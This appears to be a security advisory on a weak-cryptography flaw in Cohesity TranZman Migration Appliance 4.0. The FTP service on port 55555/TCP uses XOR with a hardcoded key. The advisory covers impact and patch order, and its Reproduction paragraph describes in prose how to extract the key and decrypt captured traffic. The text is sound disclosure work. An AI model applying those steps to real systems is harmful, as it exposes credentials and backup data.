Cohesity TranZman Migration Appliance Weak Cryptography Vulnerability

A vulnerability exists in Cohesity TranZman Migration Appliance Release 4.0 Build 14614, where a weak cryptographic algorithm is used for data encryption. The TranZman FTP service on port 55555/TCP employs XOR with a static, hardcoded key for obfuscation, which can be easily reversed to expose credentials and other sensitive information. This vulnerability allows attackers to decrypt control channel traffic, forge or modify commands, and potentially exfiltrate backup files.

Impact

Exploitation of this vulnerability allows for decryption of the FTP control channel, exposing credentials and commands. It also enables unauthorized modification or replay of commands, with the possibility of bypassing certain logging mechanisms, creating an audit blind spot.

Reproduction

To reproduce this vulnerability, capture network traffic on the segment where TranZman is running, specifically on port 55555/TCP. The static XOR key, which is a copyright string, can be extracted from the application's obfuscated Perl modules. Once the key is obtained, it can be used to decrypt the FTP control channel traffic, revealing plaintext commands and allowing for the identification and retrieval of backup files.

Remediation

Cohesity has released patches for this vulnerability. Users should apply the patches in the following order: 'TZM_patch_1.patch' followed by 'TZM_1760106063_OCT2025R2_FULL.depot'. For the latest OVA version with integrated fixes, contact Cohesity support.